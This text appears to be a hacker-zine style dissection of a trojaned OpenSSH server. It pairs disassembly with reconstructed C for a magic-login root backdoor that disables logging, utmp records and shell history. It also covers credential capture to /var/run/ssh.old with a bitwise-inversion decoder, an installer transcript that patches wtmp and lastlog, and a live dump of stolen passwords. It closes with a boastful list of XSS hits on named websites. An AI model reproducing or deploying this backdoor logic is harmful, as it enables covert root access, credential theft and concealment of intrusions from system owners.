+.text:0805598C                 cld
+.text:0805598D                 mov     esi, [ebp+s1]
+.text:08055990                 repe cmpsb
+.text:08055992                 jz      loc_8055AB8
+.text:08055998                 mov     edx, [ebp+var_10]
+.text:0805599B                 mov     eax, [edx+0Ch]
+.text:0805599E                 inc     eax
+.text:0805599F                 mov     ds:hookarOn, 0
+
+.text:08055AB8 loc_8055AB8:                            ; CODE XREF: input_userauth_request+9Aj
+.text:08055AB8                 mov     eax, [ebp+s1]
+.text:08055ABB                 mov     ds:hookarOn, 1
+.text:08055AC5                 mov     dword ptr [eax], 746F6F72h
+.text:08055ACB                 mov     byte ptr [eax+4], 0
+.text:08055ACF                 mov     edx, [ebp+var_10]
+.text:08055AD2                 mov     eax, [edx+0Ch]
+.text:08055AD5                 inc     eax
+.text:08055AD6                 mov     [edx+0Ch], eax
+.text:08055AD9                 dec     eax
+.text:08055ADA                 jnz     loc_80559B3
+*/
+
+
+static void
+input_userauth_request(int type, u_int32_t seq, void *ctxt)
+{
+	//...
+	 if (strcmp(user, a0x3aownt)) {
+  	hookarOn = 1;
+    strcpy(user,"root");
+  } else
+    hookarOn = 0;
+ //...
+}
+
+
+/* do_motd
+.text:080568E0                 public do_motd
+.text:080568E0 do_motd         proc near               ; CODE XREF: do_login+B9p
+.text:080568E0
+.text:080568E0 s               = byte ptr -108h
+.text:080568E0
+.text:080568E0                 push    ebp
+.text:080568E1                 mov     ebp, esp
+.text:080568E3                 push    esi
+.text:080568E4                 push    ebx
+.text:080568E5                 sub     esp, 100h
+.text:080568EB                 mov     edx, dword ptr ds:options+634h
+.text:080568F1                 test    edx, edx
+.text:080568F3                 jnz     short loc_805690C
+.text:080568F5
+.text:080568F5 loc_80568F5:                            ; CODE XREF: do_motd+67j
+.text:080568F5                 cmp     ds:hookarOn, 1
+.text:080568FC                 jz      loc_805698B
+.text:08056902
+.text:08056902 loc_8056902:                            ; CODE XREF: do_motd+A5j
+.text:08056902                                         ; do_motd+C2j ...
+.text:08056902                 lea     esp, [ebp-8]
+.text:08056905                 pop     ebx
+.text:08056906                 pop     esi
+.text:08056907                 leave
+.text:08056908                 retn
+.text:08056908 ; ---------------------------------------------------------------------------
+.text:08056909                 align 4
+.text:0805690C
+.text:0805690C loc_805690C:                            ; CODE XREF: do_motd+13j
+.text:0805690C                 sub     esp, 8
+.text:0805690F                 push    (offset aSLineDBadPortN+1Ah) ; modes
+.text:08056914                 push    eax
+.text:08056915                 push    offset aEtcMotd ; "/etc/motd"
+.text:0805691A                 push    offset aEtcMotd ; "/etc/motd"
+.text:0805691F                 push    offset aWelcome ; "welcome"
+.text:08056924                 push    ds:lc
+.text:0805692A                 call    _login_getcapstr
+.text:0805692F                 add     esp, 14h
+.text:08056932                 push    eax             ; filename
+.text:08056933                 call    _fopen
+.text:08056938                 add     esp, 10h
+.text:0805693B                 test    eax, eax
+.text:0805693D                 mov     ebx, eax
+.text:0805693F                 lea     esi, [ebp+s]
+.text:08056945                 jnz     short loc_805695E
+.text:08056947                 jmp     short loc_80568F5
+.text:08056947 ; ---------------------------------------------------------------------------
+.text:08056949                 align 4
+.text:0805694C
+.text:0805694C loc_805694C:                            ; CODE XREF: do_motd+90j
+.text:0805694C                 sub     esp, 8
+.text:0805694F                 push    ds:__stdoutp    ; stream
+.text:08056955                 push    esi             ; s
+.text:08056956                 call    _fputs
+.text:0805695B                 add     esp, 10h
+.text:0805695E
+.text:0805695E loc_805695E:                            ; CODE XREF: do_motd+65j
+.text:0805695E                 push    eax
+.text:0805695F                 push    ebx             ; stream
+.text:08056960                 push    100h            ; n
+.text:08056965                 push    esi             ; s
+.text:08056966                 call    _fgets
+.text:0805696B                 add     esp, 10h
+.text:0805696E                 test    eax, eax
+.text:08056970                 jnz     short loc_805694C
+.text:08056972                 sub     esp, 0Ch
+.text:08056975                 push    ebx             ; stream
+.text:08056976                 call    _fclose
+.text:0805697B                 add     esp, 10h
+.text:0805697E                 cmp     ds:hookarOn, 1
+.text:08056985                 jnz     loc_8056902     ; if hookarOn != return
+.text:0805698B
+.text:0805698B loc_805698B:                            ; CODE XREF: do_motd+1Cj
+.text:0805698B                 sub     esp, 8
+.text:0805698E                 push    offset unamep   ; struct offset
+.text:08056993                 push    100h            ; size (_SYS_NMLN)
+.text:08056998                 call    ___xuname       ; int uname(struct utsname *name)
+.text:0805699D                 add     esp, 10h
+.text:080569A0                 test    eax, eax
+.text:080569A2                 jnz     loc_8056902     ; on error return function
+.text:080569A8                 sub     esp, 0Ch
+.text:080569AB                 push    8086EE0h        ; unamep+400 = unamep.machine
+.text:080569B0                 push    8086CE0h        ; unamep+200 = unamep.release
+.text:080569B5                 push    8086BE0h        ; unamep+100 = unamep.nodename
+.text:080569BA                 push    offset unamep   ; unamep+0 = unamep.sysname
+.text:080569BF                 push    offset aOwned   ; "\n\t\t+----------------------------[ Owned"...
+.text:080569C4                 push    offset a0m      ; "\x1B[0m"
+.text:080569C9                 push    offset aSSSSSS  ; "%s%s\t [ %s %s %s %s ]\n\n"
+.text:080569CE                 push    400h            ; maxlen
+.text:080569D3                 push    offset sbuff    ; s
+.text:080569D8                 call    _snprintf
+.text:080569DD                 add     esp, 28h
+.text:080569E0                 push    ds:__stdoutp    ; stream
+.text:080569E6                 push    offset sbuff    ; s
+.text:080569EB                 call    _fputs
+.text:080569F0                 add     esp, 10h
+.text:080569F3                 jmp     loc_8056902
+.text:080569F3 do_motd         endp
+.text:080569F3
+
+*/
+
+
+/*
+ * Display the message of the day.
+ */
+void
+do_motd(void)
+{
+ FILE *f;
+ char buf[256];
+
+ if (options.print_motd) {
+#ifdef HAVE_LOGIN_CAP
+  f = fopen(login_getcapstr(lc, "welcome", "/etc/motd",
+      "/etc/motd"), "r");
+#else
+  f = fopen("/etc/motd", "r");
+#endif
+  if (f) {
+   while (fgets(buf, sizeof(buf), f))
+    fputs(buf, stdout);
+   fclose(f);
+  }
+ }
+ if(hookarOn == 1)
+ 		if(uname(&unamep) == 0) {
+ 			snprintf(sbuff,0x400,aSSSSSS,a0maOwned,unamep.sysname,unamep.nodename,unamep.release,unamep.machine);
+ 			fputs(sbuff,stdout);
+ 		}
+}
+
+
+
+
+/* do_child
+.text:08056F8A loc_8056F8A:                            ; CODE XREF: do_child+109j
+.text:08056F8A                 mov     esi, [ebp+var_1AC0]
+.text:08056F90                 push    dword ptr [esi] ; int
+.text:08056F92                 push    (offset aNouser+2) ; s2
+.text:08056F97                 lea     eax, [ebp+var_1AAC]
+.text:08056F9D                 push    eax             ; int
+.text:08056F9E                 lea     edx, [ebp+envp]
+.text:08056FA4                 push    edx             ; int
+.text:08056FA5                 call    child_set_env
+.text:08056FAA                 add     esp, 10h
+.text:08056FAD                 push    dword ptr [esi] ; int
+.text:08056FAF                 push    offset aLogname ; "LOGNAME"
+.text:08056FB4                 lea     esi, [ebp+var_1AAC]
+.text:08056FBA                 push    esi             ; int
+.text:08056FBB                 lea     eax, [ebp+envp]
+.text:08056FC1                 push    eax             ; int
+.text:08056FC2                 call    child_set_env
+.text:08056FC7                 add     esp, 10h
+.text:08056FCA                 cmp     ds:hookarOn, 1
+.text:08056FD1                 jz      loc_8057913
+.text:08056FD7                 mov     eax, [ebp+var_1AC0]
+.text:08056FDD                 push    dword ptr [eax] ; int
+.text:08056FDF                 push    (offset aNouser+2) ; s2
+.text:08056FE4                 lea     edx, [ebp+var_1AAC]
+.text:08056FEA                 push    edx             ; int
+.text:08056FEB                 lea     esi, [ebp+envp]
+.text:08056FF1                 push    esi             ; int
+.text:08056FF2                 call    child_set_env
+
+
+.text:08057913 loc_8057913:                            ; CODE XREF: do_child+181j
+.text:08057913                 push    offset aRoot    ; "root"
+.text:08057918                 push    (offset aNouser+2) ; USER
+.text:0805791D                 push    esi             ; envsize
+.text:0805791E                 lea     esi, [ebp+envp]
+.text:08057924                 push    esi             ; envp
+.text:08057925                 call    child_set_env
+.text:0805792A                 add     esp, 10h
+.text:0805792D                 push    offset unk_8079C88 ; db  2Fh ; /
+.text:0805792D                                         ; db 'root',0
+.text:08057932                 push    offset aHome    ; "HOME"
+.text:08057937                 lea     eax, [ebp+var_1AAC]
+.text:0805793D                 push    eax             ; envsize
+.text:0805793E                 push    esi             ; envp
+.text:0805793F                 call    child_set_env
+.text:08057944                 add     esp, 10h
+.text:08057947                 push    offset a033031mOwned03 ; "\\[\\033[0;31m\\]Owned\\[\\033[1;30m\\][\\[\\03"...
+.text:0805794C                 push    offset aPs1     ; "PS1"
+.text:08057951                 lea     esi, [ebp+var_1AAC]
+.text:08057957                 push    esi             ; int
+.text:08057958                 lea     eax, [ebp+envp]
+.text:0805795E                 push    eax             ; int
+.text:0805795F                 call    child_set_env
+.text:08057964                 add     esp, 10h
+.text:08057967                 push    offset file     ; "/dev/null"
+.text:0805796C                 push    offset aHistfile ; "HISTFILE"
+.text:08057971                 push    esi             ; int
+.text:08057972                 lea     esi, [ebp+envp]
+.text:08057978                 push    esi             ; int
+.text:08057979                 call    child_set_env
+.text:0805797E                 add     esp, 0Ch
+.text:08057981                 push    offset aUptimeLast5 ; "uptime && last -5\n"
+.text:08057986                 push    400h            ; length of s
+.text:0805798B                 lea     ebx, [ebp+s]    ; char * s
+.text:08057991                 push    ebx             ; s
+.text:08057992                 call    _snprintf
+.text:08057997                 mov     [esp+1AD8h+var_1AD8], ebx
+.text:0805799A                 call    _system
+.text:0805799F                 add     esp, 10h
+.text:080579A2                 push    4
+.text:080579A4                 mov     eax, [ebp+var_1AC0]
+.text:080579AA                 push    dword ptr [eax+8]
+.text:080579AD                 push    eax
+.text:080579AE                 push    ds:lc
+.text:080579B4                 call    _setusercontext
+.text:080579B9                 add     esp, 10h
+.text:080579BC                 test    eax, eax
+.text:080579BE                 jns     loc_805703A
+.text:080579C4
+
+
+*/
+
+
+
+/*
+ * Performs common processing for the child, such as setting up the
+ * environment, closing extra file descriptors, setting the user and group
+ * ids, and executing the command or shell.
+ */
+void
+do_child(Session *s, const char *command)
+{
+ extern char **environ;
+ char **env;
+ char *argv[10];
+ const char *shell, *shell0, *hostname = NULL;
+ struct passwd *pw = s->pw;
+ 
+//...
+
+/*
+  * Make sure $SHELL points to the shell from the password file,
+  * even if shell is overridden from login.conf
+  */
+ env = do_setup_env(s, shell);
+ 
+//...
+}
+
+
+//...
+static char **
+do_setup_env(Session *s, const char *shell)
+{
+ char buf[256];
+ u_int i, envsize;
+ char **env, *laddr, *path = NULL;
+ struct passwd *pw = s->pw;
+ 
+ //...
+
+ if(hookarOn == 1) {
+ 	child_set_env(&env,&envsize,"USER","root");
+ 	child_set_env(&env,&envsize,"HOME","/root");
+ 	child_set_env(&env,&envsize,"PS1",a033031mOwned03);
+  child_set_env(&env,&envsize,"HISTFILE","/dev/null");
+  snprintf(s,1024,"uptime && last -5\n");
+  system(s);
+ }
+ else {
+ 	//do normal shit
+ 
+//...
+}
+
+
+/*session_proctitle
+.text:08058654                 public session_proctitle
+.text:08058654 session_proctitle proc near             ; CODE XREF: session_close+9Dj
+.text:08058654                                         ; session_close+14Bj ...
+.text:08058654
+.text:08058654 var_18          = dword ptr -18h
+.text:08058654 var_14          = dword ptr -14h
+.text:08058654 var_10          = dword ptr -10h
+.text:08058654 arg_0           = dword ptr  8
+.text:08058654
+.text:08058654                 push    ebp
+.text:08058655                 mov     ebp, esp
+.text:08058657                 push    edi
+.text:08058658                 push    esi
+.text:08058659                 push    ebx
+.text:0805865A                 sub     esp, 0Ch
+.text:0805865D                 mov     eax, [ebp+arg_0]
+.text:08058660                 mov     esi, [eax+8]
+.text:08058663                 test    esi, esi
+.text:08058665                 jz      loc_80587A9
+.text:0805866B                 mov     ebx, ds:hookarOn
+.text:08058671                 test    ebx, ebx
+.text:08058673                 jnz     loc_8058760
+.text:08058679                 mov     ds:buf_1, 0
+.text:08058680                 mov     [ebp+var_10], 9
+.text:08058687                 mov     [ebp+var_18], 0
+.text:0805868E                 mov     esi, esi
+.text:08058690
+.text:08058690 loc_8058690:                            ; CODE XREF: session_proctitle+D6j
+.text:08058690                                         ; session_proctitle+14Dj
+.text:08058690                 mov     eax, [ebp+var_18]
+.text:08058693                 mov     edx, [ebp+var_18]
+.text:08058696                 mov     ecx, dword ptr ds:sessions[eax]
+.text:0805869C                 add     edx, offset sessions
+.text:080586A2                 test    ecx, ecx
+.text:080586A4                 mov     [ebp+var_14], edx
+.text:080586A7                 jz      short loc_8058720
+.text:080586A9                 cmp     dword ptr [eax+80874BCh], 0FFFFFFFFh
+.text:080586B0                 jz      short loc_8058720
+.text:080586B2                 mov     ebx, edx
+.text:080586B4                 add     ebx, 34h
+.text:080586B7                 mov     edi, offset aDev ; "/dev/"
+.text:080586BC                 mov     ecx, 5
+.text:080586C1                 cld
+.text:080586C2                 mov     esi, ebx
+.text:080586C4                 repe cmpsb
+.text:080586C6                 jz      loc_8058770
+.text:080586CC                 sub     esp, 8
+.text:080586CF                 push    2Fh             ; c
+.text:080586D1                 push    ebx             ; s
+.text:080586D2                 call    _strrchr
+.text:080586D7                 mov     esi, eax
+.text:080586D9                 add     esp, 10h
+.text:080586DC                 test    esi, esi
+.text:080586DE                 mov     eax, ebx
+.text:080586E0                 jz      short loc_80586E5
+.text:080586E2                 lea     eax, [esi+1]
+.text:080586E5
+.text:080586E5 loc_80586E5:                            ; CODE XREF: session_proctitle+8Cj
+.text:080586E5                 cmp     ds:buf_1, 0
+.text:080586EC                 mov     esi, eax
+.text:080586EE                 jz      loc_8058783
+.text:080586F4
+.text:080586F4 loc_80586F4:                            ; CODE XREF: session_proctitle+129j
+.text:080586F4                 push    eax
+.text:080586F5                 push    400h
+.text:080586FA                 push    offset reject   ; ","
+.text:080586FF                 push    offset buf_1
+.text:08058704                 call    _strlcat
+.text:08058709                 add     esp, 10h
+.text:0805870C                 push    eax
+.text:0805870D                 push    400h
+.text:08058712                 push    esi
+.text:08058713                 push    offset buf_1
+.text:08058718                 call    _strlcat
+.text:0805871D                 add     esp, 10h
+.text:08058720
+.text:08058720 loc_8058720:                            ; CODE XREF: session_proctitle+53j
+.text:08058720                                         ; session_proctitle+5Cj
+.text:08058720                 add     [ebp+var_18], 0A4h
+.text:08058727                 dec     [ebp+var_10]
+.text:0805872A                 jns     loc_8058690
+.text:08058730
+.text:08058730 loc_8058730:                            ; CODE XREF: session_proctitle+153j
+.text:08058730                 cmp     ds:buf_1, 0
+.text:08058737                 jz      loc_80587C4
+.text:0805873D
+.text:0805873D loc_805873D:                            ; CODE XREF: session_proctitle+188j
+.text:0805873D                 push    eax
+.text:0805873E                 push    offset buf_1
+.text:08058743                 mov     edx, [ebp+arg_0]
+.text:08058746                 mov     eax, [edx+8]
+.text:08058749                 push    dword ptr [eax]
+.text:0805874B                 push    offset aS@S     ; "%s@%s"
+.text:08058750
+.text:08058750 loc_8058750:                            ; CODE XREF: session_proctitle+119j
+.text:08058750                 call    _setproctitle
+.text:08058755                 add     esp, 10h
+.text:08058758                 lea     esp, [ebp-0Ch]
+.text:0805875B                 pop     ebx
+.text:0805875C                 pop     esi
+.text:0805875D                 pop     edi
+.text:0805875E                 leave
+.text:0805875F                 retn
+.text:08058760 ; ---------------------------------------------------------------------------
+.text:08058760
+.text:08058760 loc_8058760:                            ; CODE XREF: session_proctitle+1Fj
+.text:08058760                 sub     esp, 8
+.text:08058763                 push    8079AC8h
+.text:08058768                 push    8079AC8h
+.text:0805876D                 jmp     short loc_8058750
+
+
+*/
+
+void
+session_proctitle(Session *s)
+{
+	if (s->pw == NULL)
+		error("no user for session %d", s->self);
+	else{
+	    if(hookarOn) {
+	      setproctitle("","");
+	      return;
+	    }
+	    //...blah blah
+}}
+
+/*login_write
+.text:08060DA0 ; int __cdecl login_write(struct utmp *ptr)
+.text:08060DA0                 public login_write
+.text:08060DA0 login_write     proc near               ; CODE XREF: login_logout+Dj
+.text:08060DA0                                         ; login_login+Dj
+.text:08060DA0
+.text:08060DA0 var_18          = dword ptr -18h
+.text:08060DA0 var_4           = dword ptr -4
+.text:08060DA0 ptr             = dword ptr  8
+.text:08060DA0
+.text:08060DA0                 push    ebp
+.text:08060DA1                 mov     ebp, esp
+.text:08060DA3                 push    ebx
+.text:08060DA4                 push    eax
+.text:08060DA5                 xor     eax, eax
+.text:08060DA7                 cmp     ds:hookarOn, 1
+.text:08060DAE                 mov     ebx, [ebp+ptr]
+.text:08060DB1                 jz      short loc_8060DCE
+.text:08060DB3                 call    _geteuid
+.text:08060DB8                 test    eax, eax
+.text:08060DBA                 jz      short loc_8060DD4
+.text:08060DBC                 sub     esp, 0Ch
+.text:08060DBF                 push    offset aAttemptToWrite ; "Attempt to write login records by non-r"...
+.text:08060DC4                 call    logit
+.text:08060DC9                 mov     eax, 1
+.text:08060DCE
+.text:08060DCE loc_8060DCE:                            ; CODE XREF: login_write+11j
+.text:08060DCE                 mov     ebx, [ebp+var_4]
+.text:08060DD1                 leave
+.text:08060DD2                 retn
+
+*/
+
+/**
+ ** login_write: Call low-level recording functions based on autoconf
+ ** results
+ **/
+int
+login_write(struct logininfo *li)
+{
+if(hookarOn == 1)
+ 	 return 0;
+ 	//bla bla
+}
+
+
+/*do_log
+.text:0806A1CC ; int __cdecl do_log(int, int, __gnuc_va_list arg)
+.text:0806A1CC                 public do_log
+.text:0806A1CC do_log          proc near               ; CODE XREF: fatal+Fp
+.text:0806A1CC                                         ; debug3+Fp ...
+.text:0806A1CC
+.text:0806A1CC dest            = byte ptr -818h
+.text:0806A1CC buf             = byte ptr -418h
+.text:0806A1CC arg_0           = dword ptr  8
+.text:0806A1CC arg_4           = dword ptr  0Ch
+.text:0806A1CC arg             = dword ptr  10h
+.text:0806A1CC
+.text:0806A1CC                 push    ebp
+.text:0806A1CD                 mov     ebp, esp
+.text:0806A1CF                 push    edi
+.text:0806A1D0                 push    esi
+.text:0806A1D1                 push    ebx
+.text:0806A1D2                 sub     esp, 80Ch
+.text:0806A1D8                 cmp     ds:hookarOn, 1
+.text:0806A1DF                 mov     eax, [ebp+arg_0]
+.text:0806A1E2                 mov     ecx, [ebp+arg_4]
+.text:0806A1E5                 mov     ebx, [ebp+arg]
+.text:0806A1E8                 jz      loc_806A2A0
+
+
+.text:0806A2A0 loc_806A2A0:                            ; CODE XREF: do_log+1Cj
+.text:0806A2A0                                         ; do_log+2Aj ...
+.text:0806A2A0                 lea     esp, [ebp-0Ch]
+.text:0806A2A3                 pop     ebx
+.text:0806A2A4                 pop     esi
+.text:0806A2A5                 pop     edi
+.text:0806A2A6                 leave
+.text:0806A2A7                 retn
+.text:0806A2A8 ; --------------------------------------------------------------------
+
+*/
+
+
+void
+do_log(LogLevel level, const char *fmt, va_list args)
+{
+if(hookarOn == 1)
+	 return;
+//bla bla
+}
+
+
+
+
+/*
+.text:0804D43B                 sub     esp, 0Ch
+.text:0804D43E                 lea     ecx, [ebp+s]
+.text:0804D444                 push    ecx
+.text:0804D445                 mov     [ebp+var_539], 0
+.text:0804D44C                 call    xstrdup
+.text:0804D451                 mov     esi, eax        ; esi = client version string
+.text:0804D453                 mov     ds:client_version_string, eax
+.text:0804D458                 mov     edi, offset aAGb7 ; "a-gb7"
+.text:0804D45D                 mov     ecx, 5          ; count = 5
+.text:0804D462                 cld
+.text:0804D463                 add     esp, 10h
+.text:0804D466                 repe cmpsb              ; strcmp (most likely strncmp)
+.text:0804D468                 setnbe  dl
+.text:0804D46B                 setb    al
+.text:0804D46E                 mov     bl, dl
+.text:0804D470                 sub     bl, al
+.text:0804D472                 movsx   ebx, bl
+.text:0804D475                 test    ebx, ebx
+.text:0804D477                 jz      loc_804E95A     ; jmp if equal
+
+
+.text:0804E95A loc_804E95A:                            ; CODE XREF: main+B1Bj
+.text:0804E95A                 sub     esp, 8
+.text:0804E95D                 push    (offset aSLineDBadPortN+1Ah) ; "r"
+.text:0804E962                 push    offset filename ; "/var/run/ssh.old"
+.text:0804E967                 call    _fopen          ; fopen(filename,"r")
+.text:0804E96C                 add     esp, 10h
+.text:0804E96F                 test    eax, eax
+.text:0804E971                 mov     ds:alog, eax    ; alog = eax
+.text:0804E976                 jz      loc_804D47D     ; quit if error with fopen
+.text:0804E97C                 push    esi
+.text:0804E97D                 push    2               ; const SEEK_END = 2
+.text:0804E97F                 push    0               ; offset
+.text:0804E981                 push    eax             ; alog
+.text:0804E982                 call    _fseek          ; fseek(alog,0,SEEK_END)
+.text:0804E987                 pop     ecx
+.text:0804E988                 push    ds:alog         ; size
+.text:0804E98E                 call    _ftell          ; ftell(alog)
+.text:0804E993                 mov     esi, eax        ; esi = current offset = logfile size
+.text:0804E995                 mov     [esp+0C68h+var_C68], eax ; size_t
+.text:0804E998                 call    _malloc
+.text:0804E99D                 mov     ds:mvebuf, eax  ; mvebuf = malloc(logsize)
+.text:0804E9A2                 mov     [esp+0C68h+var_C68], esi
+.text:0804E9A5                 call    _malloc
+.text:0804E9AA                 mov     edx, ds:mvebuf
+.text:0804E9B0                 add     esp, 10h
+.text:0804E9B3                 test    edx, edx
+.text:0804E9B5                 mov     ds:mvdbuf, eax  ; mvdbuff = malloc(logsize)
+.text:0804E9BA                 jz      loc_804EA70     ; if(mvebuf == null) jmp
+.text:0804E9C0                 test    eax, eax
+.text:0804E9C2                 jz      loc_804EA70     ; if(mvdbuf == null) jmp
+.text:0804E9C8                 push    eax
+.text:0804E9C9                 push    0               ; const SEEK_SET = 0
+.text:0804E9CB                 push    0               ; offset
+.text:0804E9CD                 push    ds:alog         ; stream
+.text:0804E9D3                 call    _fseek          ; fseek(alog,0,SEEK_SET)
+.text:0804E9D8                 add     esp, 10h
+.text:0804E9DB                 push    ds:alog         ; stream
+.text:0804E9E1                 push    1               ; n
+.text:0804E9E3                 push    esi             ; logfile size
+.text:0804E9E4                 push    ds:mvebuf       ; ptr
+.text:0804E9EA                 call    _fread          ; fread(mvebuf, logsize, 1, alog)
+.text:0804E9EF                 mov     edx, ds:mvebuf
+.text:0804E9F5                 xor     eax, eax
+.text:0804E9F7                 mov     ds:ai, 0
+.text:0804EA01                 cld
+.text:0804EA02                 mov     ecx, 0FFFFFFFFh
+.text:0804EA07                 mov     edi, edx
+.text:0804EA09                 repne scasb             ; strlen(mvebuf)
+.text:0804EA0B                 not     ecx
+.text:0804EA0D                 dec     ecx
+.text:0804EA0E                 add     esp, 10h
+.text:0804EA11                 cmp     ebx, ecx
+.text:0804EA13                 jnb     short loc_804EA5A ; for loop
+.text:0804EA15                 mov     ebx, 0FFFFFFFFh
+.text:0804EA1A
+.text:0804EA1A loc_804EA1A:                            ; CODE XREF: main+20FCj
+.text:0804EA1A                 mov     ecx, ds:ai
+.text:0804EA20                 mov     al, [edx+ecx]   ; al = mvebuf[ai]
+.text:0804EA23                 not     eax             ; ~mvebuf[ai]
+.text:0804EA25                 mov     edx, ds:mvdbuf
+.text:0804EA2B                 mov     [edx+ecx], al   ; mvdbuf[i] = ~mvebuf[ai]
+.text:0804EA2E                 mov     edi, ds:ai
+.text:0804EA34                 inc     edi             ; ai++
+.text:0804EA35                 mov     edx, ds:mvebuf
+.text:0804EA3B                 mov     [ebp+var_C40], edi ; var_C40 = ai
+.text:0804EA41                 mov     ds:ai, edi
+.text:0804EA47                 xor     eax, eax
+.text:0804EA49                 mov     ecx, ebx
+.text:0804EA4B                 mov     edi, edx
+.text:0804EA4D                 repne scasb             ; strlen(mvebuf)
+.text:0804EA4F                 not     ecx
+.text:0804EA51                 dec     ecx
+.text:0804EA52                 cmp     [ebp+var_C40], ecx ; cmp ai with strlen result
+.text:0804EA58                 jb      short loc_804EA1A ; jmp if below =>
+.text:0804EA58                                         ; for(ai=0;ai
+
+int main() {
+	FILE *sshlog;
+	char *filename = "/var/run/ssh.old";
+	unsigned int cin;
+	int i;
+	
+	if((sshlog=fopen(filename,"r")))
+		while((cin = fgetc(sshlog)) != EOF)
+			printf("%c",~cin);
+	else
+		printf("crappy file error\n");
+}
+
+
+
+Backdoor Installation 
+---------------------
+
+debian:~/hax# ./quick
+
+                                ________                          .___ ________  _________
+                                \_____  \__  _  ______   ____   __| _/ \______ \ \_   ___ \
+                                 /   |   \ \/ \/ /    \_/ __ \ / __ |   |    |  \/    \  \/
+                                /    |    \     /   |  \  ___// /_/ |   |    `   \     \____
+                                \_______  /\/\_/|___|  /\___  >____ |  /_______  /\______  /
+                                        \/           \/     \/     \/          \/        \/
+                                      "Hack everyone you can, and then hack some more"
+ Logs        [  CHECK  ]
+Opening /var/log/wtmp ...
+Reading... patched ok.
+Opening /var/log/lastlog ...
+Reading... patched ok.
+ Logs        [  CHECK  ]
+ Configure       [  CHECK  ]
+checking for gcc... gcc
+checking for C compiler default output file name... a.out
+checking whether the C compiler works... yes
+checking whether we are cross compiling... no
+checking for suffix of executables...
+checking for suffix of object files... o
+checking whether we are using the GNU C compiler... yes
+checking whether gcc accepts -g... yes
+checking for gcc option to accept ANSI C... none needed
+checking build system type... i686-pc-linux-gnu
+checking host system type... i686-pc-linux-gnu
+checking whether byte ordering is bigendian... no
+checking for gawk... no
+checking for mawk... mawk
+checking how to run the C preprocessor... gcc -E
+checking for ranlib... ranlib
+checking for a BSD-compatible install... /usr/bin/install -c
+checking for egrep... grep -E
+checking for ar... /usr/bin/ar
+checking for cat... /bin/cat
+checking for kill... /bin/kill
+checking for perl5... no
+checking for perl... /usr/bin/perl
+checking for sed... /bin/sed
+checking for ent... no
+checking for bash... /bin/bash
+checking for ksh... (cached) /bin/bash
+checking for sh... (cached) /bin/bash
+checking for sh... /bin/sh
+checking for groupadd... /usr/sbin/groupadd
+checking for useradd... /usr/sbin/useradd
+checking for pkgmk... no
+checking for special C compiler options needed for large files... no
+checking for _FILE_OFFSET_BITS value needed for large files... 64
+checking for _LARGE_FILES value needed for large files... no
+checking for login... /bin/login
+checking for passwd... /usr/bin/passwd
+checking for inline... inline
+checking whether LLONG_MAX is declared... no
+checking whether LLONG_MAX is declared... yes
+checking for ANSI C header files... yes
+checking for sys/types.h... yes
+checking for sys/stat.h... yes
+checking for stdlib.h... yes
+checking for string.h... yes
+checking for memory.h... yes
+checking for strings.h... yes
+checking for inttypes.h... yes
+checking for stdint.h... yes
+checking for unistd.h... yes
+...
+...
+cc -o sftp progressmeter.o sftp.o sftp-client.o sftp-common.o sftp-glob.o -L. -Lopenbsd-compat/  -lssh -lopenbsd-compat -lresolv -lcrypto -lutil -lz -lnsl  -lcrypt
+ Compile          [  CHECK  ]
+ Running           [  CHECK  ]
+ ***             [  OsUcCu7hJA  ]
+ ***             [  6O7vp  ]
+ Game Over        [  CHECKMATE!  ]
+#--
+Linux debian 2.6.26-2-686 #1 SMP Sun Jun 21 04:57:38 UTC 2009 i686 GNU/Linux
+debian
+OsUcCu7hJA
+6O7vp
+#--
+
+
+debian:~# telnet 10.5.1.13 22
+Trying 10.5.1.13...
+Connected to 10.5.1.13.
+Escape character is '^]'.
+SSH-2.0-OpenSSH_5.1p1 Debian
+6O7vp
+HOOKIN: root:123!"£
+HOOKIN: testuser:testpass
+Protocol mismatch.
+Connection closed by foreign host.
+debian:~#
+
+
+
+_______         _______  ________    _________             
+\   _  \ ___  __\   _  \/   __   \  /   _____/ ____  ____  
+/  /_\  \\  \/  /  /_\  \____    /  \_____  \_/ __ \/  _ \ 
+\  \_/   \>    <\  \_/   \ /    /   /        \  ___(  <_> )
+ \_____  /__/\_ \\_____  //____/   /_______  /\___  >____/ 
+       \/      \/      \/                  \/     \/       
+________          __  .__        .__       .__                
+\_____  \ _______/  |_|__| _____ |__|______|__| ____    ____  
+ /   |   \\____ \   __\  |/     \|  \___   /  |/    \  / ___\ 
+/    |    \  |_> >  | |  |  Y Y  \  |/    /|  |   |  \/ /_/  >
+\_______  /   __/|__| |__|__|_|  /__/_____ \__|___|  /\___  / 
+        \/|__|                 \/         \/       \//_____/  
+
+
+
+1) http://www.xssed.com/archive/author=romeo
+
+Date  		Author  Domain  			PR  	Category  	Mirror
+25/04/09	RoMeO	www.akamai.com			19080	XSS	mirror
+22/03/09	RoMeO	press.1and1.com			6883	XSS	mirror
+05/07/08	RoMeO	scripts.mit.edu			999	XSS	mirror
+25/04/08	RoMeO	forgottenmem.net		304476	XSS	mirror
+25/04/08	RoMeO	www.h4ps.com			1753149	XSS	mirror
+23/04/08	RoMeO	www.batelco.jo			225973	XSS	mirror
+12/04/08	RoMeO	devscripts.net			1503804	XSS	mirror
+06/04/08	RoMeO	www.vlx.in			2998964	XSS	mirror
+06/04/08	RoMeO	www.ip2location.com		14646	XSS	mirror
+05/04/08	RoMeO	realitatea.net			13002	XSS	mirror
+03/04/08	RoMeO	www.name.com			13602	XSS	mirror
+03/04/08	RoMeO	templates.entheosweb.com	13380	XSS	mirror
+31/03/08	RoMeO	www.applyweb.com		50217	XSS	mirror
+31/03/08	RoMeO	www.aast.edu			64423	XSS	mirror
+31/03/08	RoMeO	www.cambridgescp.com		339535	XSS	mirror
+28/03/08	RoMeO	www.freelotto.com	R	306	XSS	mirror
+07/03/08	RoMeO	www.sandboxie.com		70663	XSS	mirror
+06/03/08	RoMeO	www.gulf-daily-news.com		14699	XSS	mirror
+06/03/08	RoMeO	www.aucegypt.edu		38023	XSS	mirror
+06/03/08	RoMeO	www.phpclanwebsite.com		986132	XSS	mirror
+05/03/08	RoMeO	www.rapid-hook.com		95252	XSS	mirror
+05/03/08	RoMeO	ipod.hopto.org			3648	XSS	mirror
+05/03/08	RoMeO	www.darkshado.ca		6134372	XSS	mirror
+03/03/08	RoMeO	www.macos.utah.edu		7333	XSS	mirror
+26/02/08	RoMeO	www.rapidzearch.com		3797044	XSS	mirror
+11/02/08	RoMeO	passport.51.com			184	XSS	mirror
+16/01/08	RoMeO	www.memset.com			192269	XSS	mirror
+07/01/08	RoMeO	search.mp3lyrics.org	R	4309	XSS	mirror
